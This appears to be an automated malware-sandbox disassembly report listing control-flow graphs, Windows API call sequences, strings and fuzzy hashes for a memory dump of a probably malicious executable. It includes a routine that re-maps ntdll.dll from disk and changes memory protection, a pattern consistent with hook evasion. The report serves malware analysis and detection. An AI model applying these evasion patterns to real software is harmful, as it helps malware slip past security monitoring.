                                                                                                                                                                      control_flow_graph 632 401fa8-401fda call 41158b call 403336 call 405f4e 639 401fdb-401fee call 4033f9 632->639 642 401ff0-401ff5 639->642 643 401ff7-40200a call 4033f9 639->643 642->639 646 402012-402025 call 4033f9 643->646 647 40200c-402010 643->647 650 402034-402047 call 4033f9 646->650 651 402027-402030 646->651 647->639 656 402053-402068 call 4033f9 650->656 657 402049 650->657 651->639 652 402032 651->652 654 40204b-402051 652->654 654->639 660 402087-402099 call 4033f9 656->660 661 40206a-402071 656->661 657->654 663 4020af-4020b1 660->663 668 40209b-4020ad call 4033f9 660->668 662 402073-402085 call 41b200 661->662 661->663 662->663 663->639 668->663 671 4020b6-4020bf call 4048fa 668->671 674 4020c1-4020c6 671->674 675 4020cb-4020d4 call 4048b5 671->675 674->639 678 4020e4-4020eb 675->678 679 4020d6-4020df 675->679 680 4020ed-4020f1 678->680 681 40213f-402142 call 411656 678->681 679->639 682 4020f3-402113 call 4116bd call 41185b * 2 680->682 683 402115-402116 call 4116bd 680->683 686 402147-40214b call 41185b 681->686 688 40211b-40212e call 40476f 682->688 683->688 693 402150-402180 call 41158b call 404cf6 call 411554 call 405f4e 686->693 688->693 697 402130-40213d call 41185b 688->697 709 402186-402192 call 4026d2 693->709 710 40228c-4022b5 call 419a19 * 2 call 403385 call 419a19 693->710 697->686 709->710 716 402198-4021a0 709->716 718 4021a2-4021a6 call 41185b 716->718 719 4021ab-4021b9 call 405f4e 716->719 718->719 726 40223f-402250 call 40230a 719->726 727 4021bf-402220 call 41178d call 411768 call 411748 call 411554 call 419a19 * 3 call 4025a9 719->727 733 402252-402257 call 4026a4 726->733 734 402259-40225a SetLastError 726->734 758 402225-40222d 727->758 733->710 738 402260-402267 734->738 741 402276-402281 call 409be6 738->741 742 402269-402274 GetLastError 738->742 744 402284-40228b call 40637a 741->744 742->741 742->744 744->710 759 402237-40223d call 419a19 758->759 760 40222f-402235 call 419a19 758->760 759->738 760->733
                                                                                                                                                                      APIs
                                                                                                                                                                        • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000,?,00000000,00401FC8,?,?,?,?), ref: 0040334F
                                                                                                                                                                        • Part of subcall function 00403336: GetCurrentDirectoryW.KERNEL32(00000000,00000000,00000000), ref: 00403365
                                                                                                                                                                      • GetLastError.KERNEL32(?,?,?,?,?,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00402269
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CurrentDirectory$ErrorLast
                                                                                                                                                                      • String ID: ExecuteParameters$del$forcenowait$hidcon$nowait$shc$waitall
                                                                                                                                                                      • API String ID: 1128942804-4019298132
                                                                                                                                                                      • Opcode ID: a4fa5637f2b2fb8445435a9f90dda79908bcbeb0503287340fad0f62bbd63cef
                                                                                                                                                                      • Instruction ID: ba470d6b25d153836575a33adc37793f032ec2c1f3e6f782122d04786a0af95c
                                                                                                                                                                      • Opcode Fuzzy Hash: a4fa5637f2b2fb8445435a9f90dda79908bcbeb0503287340fad0f62bbd63cef
                                                                                                                                                                      • Instruction Fuzzy Hash: F981A372900215AADB10BBA1ED56BEF37689F11318F14403FF901B61E2EBBD8A45C66D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 790 40444d-404465 call 411436 793 404725-404733 call 4058c0 790->793 796 404739 793->796 797 40446a-4044c7 call 41158b * 2 call 404197 call 40582b call 411656 call 419a19 * 2 793->797 798 40473b-40474a call 419a19 796->798 815 4044cd-4044e0 call 4058c0 797->815 816 40474e-40476d call 40556d call 419a19 * 2 797->816 815->816 821 4044e6-4044ef 815->821 816->798 821->816 823 4044f5-404507 call 4058c0 821->823 823->816 829 40450d-404517 823->829 830 404545-404569 call 41b450 829->830 831 404519-40451b 829->831 836 404613-404619 830->836 837 40456f-404573 830->837 831->816 833 404521-404540 call 403e09 call 419a19 * 2 831->833 833->793 840 40461b 836->840 841 40465d-404687 call 40582b call 411656 call 419a19 call 405174 836->841 842 4045e0-4045f2 call 41b450 837->842 844 40461d-404625 840->844 878 40468c-40469e lstrcmpW 841->878 857 4045f4-40460a call 41b450 842->857 858 404575-404578 842->858 849 404627-40462a 844->849 850 40464e-404652 844->850 854 404634-40464c call 4033a8 849->854 855 40462c-404631 849->855 850->841 856 404654-404658 850->856 854->844 854->850 855->854 860 404633 855->860 856->841 857->837 870 404610 857->870 862 40474b 858->862 863 40457e-404589 858->863 860->854 862->816 868 40465a 863->868 869 40458f-404591 863->869 868->841 872 404593-40459d 869->872 873 4045cc 869->873 870->836 876 4045c5 872->876 877 40459f-4045a1 872->877 875 4045cf-4045de call 4033a8 873->875 875->842 879 4045c7-4045ca 876->879 881 4045c1-4045c3 877->881 882 4045a3-4045a6 877->882 883 4046a0-4046ae call 411945 878->883 884 4046b4-4046be 878->884 879->875 881->879 886 4045a8-4045ab 882->886 887 4045bd-4045bf 882->887 883->816 883->884 889 4046df-4046e1 884->889 890 4045b9-4045bb 886->890 891 4045ad-4045b7 call 4033a8 886->891 887->879 892 4046c0-4046d8 lstrlenW call 41b225 889->892 893 4046e3-4046e6 889->893 890->879 891->879 892->893 905 4046da-4046dd 892->905 896 404705-40470e call 4027db 893->896 897 4046e8-4046f6 call 4040b5 893->897 904 404713-404724 call 419a19 * 2 896->904 897->896 906 4046f8-404703 call 4116bd 897->906 904->793 905->889 906->904
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: SetEnvironment$pfB${\rtf
                                                                                                                                                                      • API String ID: 0-1796240781
                                                                                                                                                                      • Opcode ID: c4ed00269bdf93297cb9b0d5d5b2101bd92b1c504376e825daef409a3baa3f3d
                                                                                                                                                                      • Instruction ID: 15084756ada713c28a5bad4634b0876b1db43443b0c502416c2195f3a5c257e2
                                                                                                                                                                      • Opcode Fuzzy Hash: c4ed00269bdf93297cb9b0d5d5b2101bd92b1c504376e825daef409a3baa3f3d
                                                                                                                                                                      • Instruction Fuzzy Hash: 01A1B4B1D00249ABDF11EB94DC41AEE7B79AF55308F14007BE601B72D2EB3D9946CB49
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1127 402900-40293b call 40323d CreateThread 1130 402960-40296d 1127->1130 1131 40293d-402944 1127->1131 1134 4029a2-4029ad 1130->1134 1135 40296f-402972 1130->1135 1132 402951-40295a WaitForSingleObject 1131->1132 1133 402946-40294b call 4084be 1131->1133 1132->1130 1133->1132 1137 402a06 1134->1137 1138 4029af-4029b1 1134->1138 1139 402974-402977 1135->1139 1140 402996 1135->1140 1144 402a0b-402a0e 1137->1144 1146 4029b3-4029c3 GetExitCodeThread 1138->1146 1147 4029cd-4029d8 1138->1147 1141 402992-402994 1139->1141 1142 402979-40297c 1139->1142 1143 402998-4029a0 call 409be6 1140->1143 1141->1143 1148 40298e-402990 1142->1148 1149 40297e-402981 1142->1149 1143->1137 1146->1147 1153 4029c5-4029c7 1146->1153 1150 4029da-4029dd 1147->1150 1151 4029df-4029e5 1147->1151 1148->1143 1154 402983-402986 1149->1154 1155 402988-402989 1149->1155 1156 40298b-40298c 1150->1156 1157 4029f0-4029fc SetLastError 1151->1157 1158 4029e7-4029ee 1151->1158 1153->1147 1160 4029c9-4029cb 1153->1160 1154->1137 1154->1155 1155->1156 1161 4029fe-402a03 call 409be6 1156->1161 1157->1161 1158->1137 1158->1157 1160->1144 1161->1137
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateThread.KERNELBASE(00000000,00000000,Function_00002CD8,?,00000000,?), ref: 0040292B
                                                                                                                                                                      • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000,?,?), ref: 00402954
                                                                                                                                                                      • GetExitCodeThread.KERNELBASE(00000000,?,?,00000000,?,?), ref: 004029B8
                                                                                                                                                                      • SetLastError.KERNEL32(00000000,?,00000000,?,?), ref: 004029F1
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Thread$CodeCreateErrorExitLastObjectSingleWait
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2732711357-0
                                                                                                                                                                      • Opcode ID: ef57aeeb5ab4f2bafb95d30090553282e92e25a6cf87afbdb57afda64763b007
                                                                                                                                                                      • Instruction ID: f99c8e3a54b4e73eb731c8599b93e74b2dfc3fbcfcf97cbc3a23e95f2fcbf95c
                                                                                                                                                                      • Opcode Fuzzy Hash: ef57aeeb5ab4f2bafb95d30090553282e92e25a6cf87afbdb57afda64763b007
                                                                                                                                                                      • Instruction Fuzzy Hash: 383121B1700215AADB348B159E8EE6B3669F781750F24863BF801F53E0D6FCC841EA6D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1164 403be2-403c14 call 41158b call 404031 GetTempPathW 1169 403c16-403c35 call 404031 GetTempPathW call 404eab 1164->1169 1170 403c39-403c3f 1164->1170 1169->1170 1171 403c42-403c77 call 404031 wsprintfW call 404eab GetFileAttributesW 1170->1171 1180 403c88-403c8e 1171->1180 1181 403c79-403c86 1171->1181 1181->1171 1181->1180
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000002), ref: 00403BFE
                                                                                                                                                                      • GetTempPathW.KERNEL32(00000001,00000000,00000001), ref: 00403C21
                                                                                                                                                                      • wsprintfW.USER32 ref: 00403C52
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(?), ref: 00403C6E
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: PathTemp$AttributesFilewsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 1746483863-0
                                                                                                                                                                      • Opcode ID: 2cb7250d9dd32dd2e9da34ed9bd700cdfbf3dca0c539c680a7ce81065cce105e
                                                                                                                                                                      • Instruction ID: 0f6a3eded4ecc7b2e8fda6e6faf6934afbfe96f23fb69cde5f4e8b06072c32c6
                                                                                                                                                                      • Opcode Fuzzy Hash: 2cb7250d9dd32dd2e9da34ed9bd700cdfbf3dca0c539c680a7ce81065cce105e
                                                                                                                                                                      • Instruction Fuzzy Hash: CD1129B2200614AFDB249F25D88086EBBADFF88354741403EFA0AF7290DB346D11C7D8
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1203 4057e3-4057f4 CreateDirectoryW 1204 405825-405827 1203->1204 1205 4057f6-405803 GetLastError 1203->1205 1206 405828-40582a 1204->1206 1207 405810-40581c GetFileAttributesW 1205->1207 1208 405805 1205->1208 1207->1204 1209 40581e-405820 1207->1209 1210 405806-40580e SetLastError 1208->1210 1209->1204 1211 405822-405823 1209->1211 1210->1206 1211->1210
                                                                                                                                                                      APIs
                                                                                                                                                                      • CreateDirectoryW.KERNELBASE(00000000,00000000,00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057EC
                                                                                                                                                                      • GetLastError.KERNEL32(?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 004057F6
                                                                                                                                                                      • SetLastError.KERNEL32(000000B7,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405806
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,?,004037E9,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00405813
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: ErrorLast$AttributesCreateDirectoryFile
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 635176117-0
                                                                                                                                                                      • Opcode ID: c94475a7de75a22d68a153ea5ce2d1e959f11f3a54dd4cd0cffd3939b8acd51a
                                                                                                                                                                      • Instruction ID: 30408092df9d9bdc1a5f6178e500957deb072df51eb03143c2aff391e1e1432a
                                                                                                                                                                      • Opcode Fuzzy Hash: c94475a7de75a22d68a153ea5ce2d1e959f11f3a54dd4cd0cffd3939b8acd51a
                                                                                                                                                                      • Instruction Fuzzy Hash: 40E06532644504EBDA213B74AC0CB5B3E59DB05761F518571FD19E41E0D33498625A9D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Control-flow Graph

                                                                                                                                                                      • Executed
                                                                                                                                                                      • Not Executed
                                                                                                                                                                      control_flow_graph 1440 40440a-404423 GetProcAddress 1441 404431-404434 1440->1441 1442 404425-404430 GetNativeSystemInfo 1440->1442
                                                                                                                                                                      APIs
                                                                                                                                                                      • GetProcAddress.KERNEL32(GetNativeSystemInfo), ref: 0040441B
                                                                                                                                                                      • GetNativeSystemInfo.KERNELBASE(?,?,?,004026E0,?,0040218F,?,00000000), ref: 00404429
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: AddressInfoNativeProcSystem
                                                                                                                                                                      • String ID: GetNativeSystemInfo
                                                                                                                                                                      • API String ID: 2220751540-3949249589
                                                                                                                                                                      • Opcode ID: cd7d1f359f3f8d9de020c7390f6b521e34627b29987b9aa14a3313eaddf80d86
                                                                                                                                                                      • Instruction ID: fdf40642b98aea9645ff5ce2bfc25f6c93e65cfe5bbcd3fb8bf9b0548ca8598f
                                                                                                                                                                      • Opcode Fuzzy Hash: cd7d1f359f3f8d9de020c7390f6b521e34627b29987b9aa14a3313eaddf80d86
                                                                                                                                                                      • Instruction Fuzzy Hash: 59D0A73030020856CB14DB75AD02A5A73E496486087440570E402F00D0EA7DDD41D768
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenW.KERNEL32(?,00000000,00000000,?,?,?,?,00402FA6,?,?), ref: 00403776
                                                                                                                                                                      • GetSystemTimeAsFileTime.KERNEL32(00402FA6,00000000,?,?,?,?,00402FA6,?,?), ref: 004037F2
                                                                                                                                                                      • GetFileAttributesW.KERNELBASE(00000000,?,?,?,00402FA6,?,?), ref: 004037F9
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileTime$AttributesSystemlstrlen
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 692046673-0
                                                                                                                                                                      • Opcode ID: bb341d4c07199014ca885cd4bbd0c693b22aba785dbec032018bcfa9e4d30431
                                                                                                                                                                      • Instruction ID: 434ec4cbd3337a66c70c7224a0dd07f780f65c01fb5e0fe33510391263ed20e3
                                                                                                                                                                      • Opcode Fuzzy Hash: bb341d4c07199014ca885cd4bbd0c693b22aba785dbec032018bcfa9e4d30431
                                                                                                                                                                      • Instruction Fuzzy Hash: EC41FC76600206AADB20BF699C41AB77BECDF40355F50847BF945E75C1E738DF418298
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • lstrlenA.KERNEL32(00000000,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EF7
                                                                                                                                                                      • lstrlenA.KERNEL32(?,?,00404AC4,?,?,?,?,00000000,00000000,?,?,00000000,?), ref: 00404EFF
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: lstrlen
                                                                                                                                                                      • String ID: x86
                                                                                                                                                                      • API String ID: 1659193697-2105985432
                                                                                                                                                                      • Opcode ID: 56b900e3adc191ded6636922a00623652073f7ebfe7219639a660e1bb948576c
                                                                                                                                                                      • Instruction ID: 1a52fe1f4341d2278046df94b955c3244764cd3cb3145d185c2b391d31c35d4a
                                                                                                                                                                      • Opcode Fuzzy Hash: 56b900e3adc191ded6636922a00623652073f7ebfe7219639a660e1bb948576c
                                                                                                                                                                      • Instruction Fuzzy Hash: 3B4174B1D0025A9BDB10DFA5CC44BEFBBB8EF84344F04416AE804A7241E679D945CBA5
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040772E
                                                                                                                                                                      • GetTickCount.KERNEL32 ref: 0040773B
                                                                                                                                                                        • Part of subcall function 00406563: GetCurrentProcess.KERNEL32 ref: 0040656C
                                                                                                                                                                        • Part of subcall function 00406563: GetModuleHandleA.KERNEL32(ntdll.dll), ref: 0040657A
                                                                                                                                                                        • Part of subcall function 00406563: CreateFileA.KERNELBASE(c:\windows\system32\ntdll.dll,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00406595
                                                                                                                                                                        • Part of subcall function 00406563: CreateFileMappingW.KERNELBASE(00000000,00000000,01000002,00000000,00000000,00000000), ref: 004065A8
                                                                                                                                                                        • Part of subcall function 00406563: MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000000), ref: 004065B7
                                                                                                                                                                        • Part of subcall function 00406563: VirtualProtect.KERNELBASE(?,?,00000040,?), ref: 00406607
                                                                                                                                                                        • Part of subcall function 00406563: VirtualProtect.KERNELBASE(?,?,?,?), ref: 0040663B
                                                                                                                                                                        • Part of subcall function 00406563: FindCloseChangeNotification.KERNELBASE(?), ref: 00406651
                                                                                                                                                                        • Part of subcall function 00406563: CloseHandle.KERNEL32(?), ref: 00406656
                                                                                                                                                                        • Part of subcall function 00406563: CloseHandle.KERNEL32(?), ref: 0040665B
                                                                                                                                                                        • Part of subcall function 00406563: FreeLibrary.KERNEL32(00000000), ref: 0040665E
                                                                                                                                                                      • FreeConsole.KERNELBASE ref: 0040774D
                                                                                                                                                                        • Part of subcall function 004067D5: GetVersionExW.KERNEL32(?), ref: 00406802
                                                                                                                                                                        • Part of subcall function 004067D5: GetCommandLineW.KERNEL32(?), ref: 00406862
                                                                                                                                                                        • Part of subcall function 004067D5: GetCommandLineW.KERNEL32(00000001,?,?,?,?,00000000), ref: 004068AC
                                                                                                                                                                        • Part of subcall function 004067D5: wsprintfW.USER32 ref: 004068D6
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: CloseFileHandle$CommandCountCreateFreeLineProtectTickVirtual$ChangeConsoleCurrentFindLibraryMappingModuleNotificationProcessVersionViewwsprintf
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 4291766598-0
                                                                                                                                                                      • Opcode ID: 3ca46a93c6b10168347eebcf9c93063856af442282da1189f62fc0079eeba015
                                                                                                                                                                      • Instruction ID: fe56425bb2a0ba9ea27a46fa1b3504cd85737b5f7dd7c05133cc4a9b5b207337
                                                                                                                                                                      • Opcode Fuzzy Hash: 3ca46a93c6b10168347eebcf9c93063856af442282da1189f62fc0079eeba015
                                                                                                                                                                      • Instruction Fuzzy Hash: 82E08C32504008AFDF907FF4AC4846E3B65EB043157810432F60DD2971CB3AA871DB2B
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • GetStdHandle.KERNEL32(000000F6), ref: 0041EAF6
                                                                                                                                                                      • GetFileType.KERNELBASE(00000000), ref: 0041EB08
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: FileHandleType
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 3000768030-0
                                                                                                                                                                      • Opcode ID: 9942845071086dcf81e5714cec6cdfd1ba00491d02b78772339a5e10d5b1ef7c
                                                                                                                                                                      • Instruction ID: ae045d4cf1b03e5160a3b30c2f04a94be923d6a48ac0631af6495f2cb15e1a3f
                                                                                                                                                                      • Opcode Fuzzy Hash: 9942845071086dcf81e5714cec6cdfd1ba00491d02b78772339a5e10d5b1ef7c
                                                                                                                                                                      • Instruction Fuzzy Hash: A711A83920875145C7348E3F8C985636A94AF52370B380B1BD9B7872F1C778E9C6965D
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      APIs
                                                                                                                                                                      • Sleep.KERNEL32(00000014), ref: 00402CE8
                                                                                                                                                                      • EndDialog.USER32(00000000,00000000), ref: 00402D45
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000008.00000002.2088344302.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                      • Associated: 00000008.00000002.2088328127.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088367661.0000000000426000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088386751.0000000000430000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      • Associated: 00000008.00000002.2088403938.0000000000436000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_8_2_400000_3BD2.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: DialogSleep
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 2355613043-0
                                                                                                                                                                      • Opcode ID: dd2d5af46e462a8c14ae85c085df6146a90b8f192a789a8dbbf997dae1be6a27
